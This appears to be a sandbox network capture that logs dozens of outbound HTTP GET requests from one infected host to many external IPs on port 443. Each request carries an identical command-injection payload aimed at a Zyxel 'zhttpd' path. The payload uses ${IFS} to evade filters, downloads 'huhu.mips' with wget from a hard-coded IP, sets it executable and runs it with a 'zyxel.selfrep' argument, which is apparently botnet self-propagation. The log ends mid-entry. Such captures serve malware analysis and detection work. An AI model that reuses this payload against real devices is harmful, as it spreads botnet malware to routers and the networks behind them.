                                              Jan 29, 2024 07:03:38.793786049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1666192.168.2.144215848.188.11.184443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.793822050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1667192.168.2.143497459.73.124.52443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.793879032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1668192.168.2.1441096195.224.50.243443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.793912888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1669192.168.2.143396080.2.190.175443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.793956041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1670192.168.2.143300637.65.100.214443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.794003963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1671192.168.2.1441996101.11.135.218443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.794029951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1672192.168.2.1451768140.157.114.53443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.794076920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1673192.168.2.1456482186.233.28.74443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.794109106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1674192.168.2.145827678.119.128.24443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.794154882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1675192.168.2.145733460.128.236.158443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.794183969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1676192.168.2.144162693.89.208.4443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.794220924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1677192.168.2.1444024115.94.69.94443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.794272900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1678192.168.2.144077452.237.133.86443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.794301987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1679192.168.2.1456654107.133.185.82443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.794361115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1680192.168.2.1436026146.151.78.64443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.794382095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1681192.168.2.1453332216.127.187.53443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.794435024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1682192.168.2.1438046191.158.72.37443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.794488907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1683192.168.2.1456394135.111.47.148443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.794537067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1684192.168.2.1455022103.85.107.187443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.794572115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1685192.168.2.14336684.69.180.117443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.794611931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1686192.168.2.1434254119.101.53.52443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.794657946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1687192.168.2.146093494.80.144.246443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.794711113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1688192.168.2.144219888.34.45.149443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.794734955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1689192.168.2.1448836119.219.232.89443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.794775009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1690192.168.2.145983236.112.224.107443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.794836044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1691192.168.2.14545424.202.185.24443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.794876099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1692192.168.2.1446744199.24.59.120443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.794893980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1693192.168.2.144550865.189.82.154443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.794943094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1694192.168.2.1443870159.238.17.198443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.794982910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1695192.168.2.1451892143.131.81.28443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.795006990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1696192.168.2.1434170130.43.188.161443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.795052052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1697192.168.2.1454754111.58.90.90443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.795084953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1698192.168.2.145968048.61.214.12443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.795111895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1699192.168.2.1456904132.112.71.112443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.795145988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1700192.168.2.1447160104.207.152.145443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.795171022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1701192.168.2.14520361.215.230.83443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.795219898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1702192.168.2.145035212.142.152.3443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.795255899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1703192.168.2.144503467.127.136.250443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.795301914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1704192.168.2.1453622145.40.23.236443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.795388937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1705192.168.2.14345149.190.171.14443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.795422077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1706192.168.2.143900665.220.30.213443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.795439005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1707192.168.2.143503892.115.249.108443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.795491934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1708192.168.2.144950214.124.72.52443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.795519114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1709192.168.2.1433854158.19.238.162443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.795567989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1710192.168.2.145257684.139.51.134443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.795605898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1711192.168.2.1434052195.206.191.34443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.795638084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1712192.168.2.143979213.105.174.120443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.795643091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1713192.168.2.1458340181.95.238.80443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.795705080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1714192.168.2.1434058133.70.210.52443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.795739889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1715192.168.2.1437654148.255.237.110443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.795783043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1716192.168.2.1445298102.109.187.18443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.795840025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1717192.168.2.145766484.111.171.175443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.795874119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1718192.168.2.14374802.131.193.66443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.795922041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1719192.168.2.1453528174.132.113.171443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.795965910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1720192.168.2.1433686124.75.67.90443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.795996904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1721192.168.2.1452684202.215.195.220443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.796020031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1722192.168.2.1459772196.150.229.134443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.796080112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1723192.168.2.1438354128.133.231.134443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.796112061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1724192.168.2.143475495.36.160.49443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.796159029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1725192.168.2.1441032169.36.5.44443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.796180964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1726192.168.2.1436584177.47.166.17443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.796219110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1727192.168.2.1443026206.186.1.33443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.796252012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1728192.168.2.144306613.184.140.172443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.796278954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1729192.168.2.1443824122.159.196.131443
                                              TimestampBytes transferredDirectionData
